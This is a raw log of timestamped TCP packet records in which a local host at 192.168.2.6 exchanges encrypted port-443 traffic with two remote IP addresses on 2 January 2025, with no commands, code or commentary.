                                                  Jan 2, 2025 12:14:14.410726070 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.410748959 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.410754919 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.413183928 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.413225889 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.413250923 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.413269043 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.413299084 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.413306952 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.444773912 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.444839954 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.444839954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.444854021 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.444883108 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.444899082 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.450145960 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.450195074 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.450217962 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.450227976 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.450238943 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.450351954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.453496933 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.453536034 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.453555107 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.453560114 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.453591108 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.453598022 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.461357117 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.461400032 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.461412907 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.461419106 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.461446047 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.461463928 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.464241982 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.464279890 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.464296103 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.464301109 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.464323044 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.464340925 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.468589067 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.468653917 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.468723059 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.468774080 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.472522974 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.472579002 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.472692966 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.472759008 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.477031946 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.477071047 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.477089882 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.477094889 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.477123022 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.477133036 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.482336998 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.482397079 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.482491016 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.482554913 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.485301971 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.485354900 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.485474110 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.485533953 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.486598969 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.486673117 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.486685038 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.486738920 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.490210056 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.490272999 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.490355968 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.490411043 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.492021084 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.492084026 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.492353916 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.492402077 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.494775057 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.494832993 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.494930029 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.494985104 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.497348070 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.497401953 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.497508049 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.497575045 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.500097036 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.500158072 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.500164986 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.500211000 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.707335949 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.707438946 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849526882 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849554062 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849565983 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849637985 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849643946 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849662066 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849730015 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849735022 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849751949 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849767923 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849771976 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849802971 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849806070 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849837065 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849863052 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849874973 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.849899054 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849926949 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.849973917 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.850039959 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.850045919 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.850096941 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.850104094 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.850140095 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.850157022 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.850188017 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.055344105 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.055679083 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.267333031 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.267425060 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.679341078 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.679645061 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.828636885 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.828666925 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828681946 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828691006 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828747988 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.828754902 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828772068 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828819990 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.828824043 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828833103 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828876972 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.828881025 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828896046 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828938961 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.828958035 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.828988075 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.829001904 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.829008102 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.829077959 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.829190016 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:15.829195023 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:15.829245090 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.015693903 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.015724897 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.015794039 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.015814066 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.016012907 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.016022921 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.016033888 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.016129017 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.016215086 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.016222000 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.016269922 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.016293049 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.223246098 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.223284006 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.223339081 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.223647118 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.250777960 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.250808001 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.250871897 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.250889063 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.251275063 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.251286030 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.251391888 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.251400948 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.251419067 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.251477003 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.435815096 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.435842037 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.435888052 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.436077118 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.498176098 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.498214960 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.498285055 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.498406887 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.498436928 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.498449087 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.498536110 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.498642921 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.498648882 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.498733997 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.703344107 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.703407049 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.711730957 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.711740017 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.711750984 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.711817026 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.711822987 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.711833000 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.711926937 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.785279989 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.785300970 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.785342932 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.785346985 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.785522938 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.785530090 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.785547972 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.785563946 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.785592079 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.785684109 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.785722017 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:16.995337009 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:16.997792959 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.033524990 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.033544064 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.033586025 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.033731937 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.121830940 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.121881962 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.121908903 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.121926069 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.122139931 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.122148991 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.122216940 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.122222900 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.122349977 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.331347942 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.331429958 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.422405958 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.422455072 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.422492981 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.422667980 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.525489092 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.525521040 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.525564909 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.525583982 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.525777102 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.525785923 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.525837898 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.525844097 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.525917053 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.525983095 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:17.735342979 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:17.735618114 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.179339886 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.179428101 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.207542896 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.207576036 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.207591057 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.207653999 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.207659006 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.207668066 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.207676888 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.207712889 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.207756996 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.313487053 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.313549995 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.313576937 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.313780069 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.313791037 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.313802004 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.313823938 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.313990116 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.314065933 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.519340992 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.519399881 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.658608913 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.658627987 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.658644915 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.658724070 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.658792973 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.776463985 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:18.776493073 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:18.776578903 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:19.108977079 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:19.218755960 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:19.781567097 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:19.781625986 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:20.003417969 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:20.003457069 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:20.003701925 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:20.003978968 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:20.003993034 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.239295006 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.239387989 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.239806890 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.239816904 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.239989042 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.239995003 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.557233095 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.557277918 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.557398081 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.557430029 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.557450056 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.557482958 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.557496071 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.558300018 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.558370113 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.559813023 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.559880018 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.644560099 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.644604921 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.644726038 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.644754887 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.644799948 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.644809008 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.645334959 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.645406008 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.645415068 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.645451069 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.645461082 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.645507097 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.645625114 CET49987443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.645647049 CET4434998739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.660979986 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.661026955 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:21.661108971 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.661287069 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:21.661302090 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.003177881 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.003293037 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.003732920 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.003746033 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.003907919 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.003914118 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.321794987 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.321820021 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.321894884 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.321923971 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.321935892 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.321968079 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.322391033 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.322441101 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.322448015 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.322484970 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:23.322487116 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.322529078 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.322738886 CET49988443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:23.322753906 CET4434998839.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:15:14.100096941 CET49991443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:14.100152969 CET44349991118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:14.100230932 CET49991443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:14.108361006 CET49991443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:14.108377934 CET44349991118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:15.481267929 CET44349991118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:15.481365919 CET49991443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:15.482090950 CET44349991118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:15.482145071 CET49991443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:15.548439026 CET49991443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:15.548466921 CET44349991118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:15.548904896 CET44349991118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:15.550054073 CET49991443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:15.552987099 CET49991443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:15.599335909 CET44349991118.178.60.9192.168.2.6
